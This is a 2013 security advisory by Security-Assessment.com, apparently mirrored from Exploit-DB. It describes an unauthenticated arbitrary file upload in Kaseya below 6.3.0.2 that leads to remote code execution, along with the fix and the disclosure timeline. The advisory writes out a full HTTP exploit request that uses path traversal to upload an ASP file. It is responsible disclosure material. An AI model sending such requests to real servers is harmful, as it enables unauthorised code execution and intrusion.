Vulners
Lucene search
Kaseya < 6.3.0.2 - Arbitrary File Upload
🗓️ 18 Nov 2013 00:00:00Reported by Security-Assessment.comType 
exploitdb🔗 www.exploit-db.com👁 34 Views
( , ) (,
. `.' ) ('. ',
). , ('. ( ) (
(_,) .`), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_='`"``=.
presents..
Kaseya Arbitrary File Upload Vulnerability
Affected versions: < 6.3.0.2
PDF: http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf
+-----------+
|Description|
+-----------+
Kaseya 6.3 suffers from an Arbitrary File Upload vulnerability that can be leveraged to gain remote code
execution on the Kaseya server. The code executed in this way will run with a local IUSR account’s privileges.
The vulnerability lies within the /SystemTab/UploadImage.asp file. This file constructs a file object on disk using
user input, without first checking if the user is authenticated or if input is valid. The application preserves the
file name and extension of the upload, and allows an attacker to traverse from the default destination directory.
Directory traversal is not necessary to gain code execution however, as the default path lies within the
application’s web-root.
+------------+
|Exploitation|
+------------+
POST /SystemTab/uploadImage.asp?filename=..\..\..\..\test.asp HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
FirePHP/0.7.2
Referer: http://<host>/SystemTab/uploadImage.asp
Cookie: ASPSESSIONIDQATSBAQC=<valid session>;
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------
19172947220212
Content-Length: 89
-----------------------------19172947220212
Content-Disposition: form-data; name="uploadFile"; filename="test.asp"
Content-Type: application/octet-stream
<!DOCTYPE html>
<html>
<body>
<%
response.write("Hello World!")
%>
</body>
</html>
-----------------------------19172947220212--
+-----+
| Fix |
+-----+
Install the patch released by the vendor on the 12th of November 2013.
+-------------------+
|Disclosure Timeline|
+-------------------+
9/10/2013 Bug discovered, vendor contacted
20/10/2013 Vendor responds with email address for security contact. Advisory sent to security contact.
30/10/2013 Vendor advises that patch for the reported issue is to be included in next patch cycle.
12/11/2013 Patch released.
18/11/2013 Advisory publically released.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a New Zealand based world
leader in web application testing, network security
and penetration testing. Security-Assessment.com
services organisations across New Zealand, Australia,
Asia Pacific, the United States and the United
Kingdom.
Security-Assessment.com is currently looking for skilled penetration
testers. If you are interested, please email 'hr at security-assessment.com'
Thomas Hibbert
Security Consultant
Security-Assessment.com
Mobile: +64 27 3133777
Email: thomas.hibbert () security-assessment com
Web: www.security-assessment.comData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Nov 2013 00:00Current
7High risk
Vulners AI Score7